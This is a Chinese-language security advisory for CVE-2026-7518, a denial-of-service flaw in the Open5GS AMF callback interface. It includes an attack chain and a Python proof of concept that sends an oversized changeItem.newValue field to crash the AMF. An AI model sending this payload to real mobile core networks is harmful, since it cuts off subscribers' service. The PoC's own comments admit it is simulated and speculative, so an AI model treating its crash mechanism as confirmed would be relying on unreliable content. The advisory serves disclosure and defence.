CVE-2026-7518 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7518

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是用于4G/5G移动核心网的开源项目。CVE-2026-7518是该项目中AMF（接入和移动性管理功能）SBI端点组件存在的一个安全缺陷。该漏洞影响了`amf_namf_callback_handle_sdm_data_change_notify`函数，特别是在处理`/namf-callback/v1/{id}/sdmsubscription-notify`接口请求时。由于对`changeItem.newValue`参数的处理存在缺陷，攻击者可以通过操纵该参数触发拒绝服务条件。该漏洞利用难度低且无需用户交互，攻击者只需拥有低权限即可远程发起攻击，导致目标服务不可用。目前该漏洞利用代码已被公开，但官方尚未发布修复补丁，风险持续存在。

技术细节

该漏洞源于Open5GS的AMF组件在处理网络存储库功能（NRF）发送的SDM（订阅数据管理）变更通知时的逻辑错误。具体而言，当AMF接收到指向`/namf-callback/v1/{id}/sdmsubscription-notify`的POST请求时，会调用`amf_namf_callback_handle_sdm_data_change_notify`函数解析请求体中的JSON数据。在解析过程中，程序未对`changeItem.newValue`字段进行充分的边界检查或类型验证。攻击者可以构造包含恶意格式或超长数据的`newValue`参数。当程序尝试处理该异常数据时，可能导致内存访问越界、空指针解引用或无限循环，进而使AMF进程崩溃或挂起。由于AMF是5G核心网中负责处理用户接入和移动性的关键网元，其瘫痪会导致所有注册用户无法建立新的连接，甚至掉线。攻击向量为网络（AV:N），复杂度低（AC:L），攻击者仅需低权限（PR:L）即可远程利用，无需用户交互（UI:N）。虽然CVSS评分显示为中等，但在电信核心网环境下，可用性（A:L）的丧失具有极高的业务影响。

攻击链分析

STEP 1

侦察

攻击者扫描目标网络，识别Open5GS AMF组件的SBI接口地址及端口。

STEP 2

获取权限

攻击者获取低级别的网络访问权限（PR:L），能够向SBI接口发送数据包。

STEP 3

漏洞利用

攻击者构造恶意的HTTP POST请求发送至`/namf-callback/v1/{id}/sdmsubscription-notify`，在`changeItem.newValue`字段中填充导致崩溃的数据。

STEP 4

拒绝服务

目标AMF服务在处理异常数据时发生崩溃或停止响应，导致5G核心网接入服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Simulated based on SBI specification)
target_url = "http://<open5gs-ip>:8080/namf-callback/v1/<subscription-id>/sdmsubscription-notify"

# Malicious payload manipulating changeItem.newValue
# The vulnerability triggers when processing this specific argument.
# Sending a malformed or excessively large string might cause DoS
payload = {
    "changeType": "INSERT",
    "changeItem": {
        "resourceId": "test-resource",
        # Triggering the vulnerability by manipulating newValue
        "newValue": "A" * 10000 
    }
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

try:
    print(f"Sending exploit to {target_url}...")
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("If the service crashes, DoS is successful.")
except requests.exceptions.RequestException as e:
    print(f"Request failed (Service might be down): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

建议限制对AMF SBI接口的网络访问，仅允许受信任的NRF网元进行通信。在官方修复补丁发布前，可部署Web应用防火墙（WAF）或API网关，对传入的JSON参数长度和格式进行严格校验，拦截包含异常`changeItem.newValue`的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7518
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7518
3 Details https://www.cvedetails.com/cve/CVE-2026-7518/
4 VulDB https://vuldb.com/cve/CVE-2026-7518
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4395
7 Link https://vuldb.com/submit/804023
8 Link https://vuldb.com/vuln/360332
9 Link https://vuldb.com/vuln/360332/cti